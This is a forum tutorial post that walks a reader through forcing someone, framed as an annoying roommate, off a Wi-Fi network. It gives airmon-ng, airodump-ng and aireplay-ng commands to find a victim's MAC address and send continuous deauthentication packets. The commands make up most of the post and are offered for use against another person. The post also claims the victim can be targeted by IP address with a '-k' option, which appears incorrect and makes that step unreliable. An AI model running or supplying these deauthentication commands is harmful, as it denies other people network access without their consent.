Header Banner
Null Byte Logo
Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker

How to Kick People Off Your Internet

May 28, 2016 05:17 AM
Jun 16, 2016 03:38 PM
Command line output showing network processes and monitor mode enabled.

This is my first post please tell me what I can improve. (I don't claim any of the images. I tried taking screen shots but it froze my computer. ) I will be using wlan0 because thats my wireless but use yours.

I'm going to tech you have to kick that annoying room mate of the Internet. (I'M NOT RESPONSIBLE FOR ANY THING YOU DO WITH THIS INFO.)

Airmon-Ng

open up a terminal and type airmon-ng start wlan0 (or eth0 if your using Ethernet.) (Some times you might have to type airmon-ng check kill)

Network interface configuration with monitor mode enabled.

Airodump-Ng

Next type airodump-ng wlan0 then find your Internet copy its bssid then type airodump-ng --bssid (your bssid) wlan0. It will show your victims mac.

Network scan results showing various BSSID and station information.

Aireplay-Ng

Now if you know their IP address you don't need to use airodump-ng.

If you know their ip address you can type aireplay-ng --deauth 0 -a (networks bssid) -k (Their ip address)

If your going to use their mac address type this aireplay-ng --deauth 0 -a (networks bssid) -c (Their mac address)

The 0 in Deauth 0 means keep deauth them until you stop it with CTRL C.

Hope you enjoyed this tutorial if you need help just comment whats wrong and I will get back to you as fast as possible.

You already know how to use your phone. With Gadget Hacks' newsletter, we'll show you how to master it. Each week, we explore features, hidden tools, and advanced settings that give you more control over iOS and Android than most users even know exists.

Sign up for Gadget Hacks Weekly and start unlocking your phone's full potential.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!